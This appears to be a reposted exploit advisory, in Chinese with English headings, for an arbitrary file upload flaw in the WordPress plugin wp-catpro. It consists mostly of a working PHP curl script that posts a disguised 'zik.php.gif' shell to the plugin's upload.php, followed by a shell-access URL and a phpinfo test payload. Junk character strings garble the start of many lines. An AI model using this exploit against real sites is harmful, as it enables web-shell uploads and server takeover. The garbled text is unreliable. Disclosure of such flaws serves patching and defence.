WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
) ~+ x% G+ K1 r" `" R+ f% I
2 z  j4 m& L7 b8 Q! B3 F作者  => Zikou-16
邮箱 => zikou16x@gmail.com
+ U+ ]3 n& G6 ~测试系统 : Windows 7 , Backtrack 5r3
0 `1 M& v, C! f/ s- X7 w下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
" y: T, ~7 H5 j9 M! Y; {####
: [) u$ b; `! J
#=> Exploit 信息:
5 J6 ?; s. q# e$ x. g------------------
# 攻击者可以上传 file/shell.php.gif
7 {" O9 R! {8 Y. M# K4 G% T# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
  C" |. ~. J4 \2 y; l  P# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
( a  }- a4 C  n# j" m$ b-----------
  [. ~  ^9 a0 ]* _: u- l<?php
7 k; f) V$ i5 k$ ~$ H: S& g5 g' v4 [
$uploadfile="zik.php.gif";
( v) u- ]5 d% Z$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
- P- t8 l) c) ?curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
  v" y% J0 f  ?7 D+ ]'folder'=>'/wp-content/uploads/catpro/'));
9 v" g) i& U' c0 acurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2 v" T$ z" [- J, r$postResult = curl_exec($ch);
curl_close($ch);
1 a  T/ g( f9 D2 ^+ d( U4 U8 X5 `
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
, U9 T8 `3 J4 M  y. |  _* y1 K, w  ?>
& y/ ]2 G5 P4 e4 X<?php
phpinfo();
9 O, Y% s6 d6 o( {. {! s8 v?>